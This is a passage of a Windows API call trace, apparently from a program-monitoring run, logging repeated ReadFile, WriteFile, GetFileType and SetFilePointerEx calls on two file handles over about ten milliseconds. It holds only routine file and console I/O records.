_get_osfhandle (_FileHandle=1) returned 0x50 [0216.957] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.957] GetFileType (hFile=0x50) returned 0x1 [0216.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.957] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.957] GetFileType (hFile=0x50) returned 0x1 [0216.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.957] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.958] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.958] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.958] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.958] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.958] GetFileType (hFile=0x50) returned 0x1 [0216.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.958] GetFileType (hFile=0x50) returned 0x1 [0216.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.958] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, 
lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.958] GetFileType (hFile=0x50) returned 0x1 [0216.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.958] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.959] GetFileType (hFile=0x50) returned 0x1 [0216.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.959] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.959] GetFileType (hFile=0x50) returned 0x1 [0216.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.959] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.959] GetFileType (hFile=0x50) returned 0x1 [0216.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.959] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.959] GetFileType (hFile=0x50) returned 0x1 [0216.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.959] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, 
lpOverlapped=0x0) returned 1 [0216.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.959] GetFileType (hFile=0x50) returned 0x1 [0216.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.959] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.959] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.959] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.959] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.960] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.960] GetFileType (hFile=0x50) returned 0x1 [0216.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.960] GetFileType (hFile=0x50) returned 0x1 [0216.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.960] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.960] GetFileType (hFile=0x50) returned 0x1 [0216.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.960] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.960] GetFileType (hFile=0x50) returned 0x1 [0216.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.960] WriteFile (in: hFile=0x50, 
lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.960] GetFileType (hFile=0x50) returned 0x1 [0216.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.960] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.960] GetFileType (hFile=0x50) returned 0x1 [0216.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.960] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.961] GetFileType (hFile=0x50) returned 0x1 [0216.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.961] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.961] GetFileType (hFile=0x50) returned 0x1 [0216.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.961] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.961] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.961] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.961] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0216.961] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.961] GetFileType (hFile=0x50) returned 0x1 [0216.961] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.961] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.961] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.961] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.962] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.962] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.962] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.962] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.962] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.962] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.962] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.962] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.962] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.962] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.962] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.963] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.963] ReadFile (in: hFile=0x58, 
lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.963] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.963] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.963] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.963] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.963] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.963] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.963] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.964] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.964] ReadFile 
(in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.964] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.964] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.964] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.964] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.964] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.964] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.964] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.965] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 
[0216.965] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.965] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.965] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.965] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.965] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.965] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.966] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.966] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.966] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, 
lpOverlapped=0x0) returned 1 [0216.966] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.966] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.966] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.966] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.966] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.966] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.966] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.966] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.966] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, 
lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.967] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.967] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.967] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.967] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.967] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.967] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.967] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.967] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.967] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: 
lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.967] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.967] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.968] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.968] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.968] 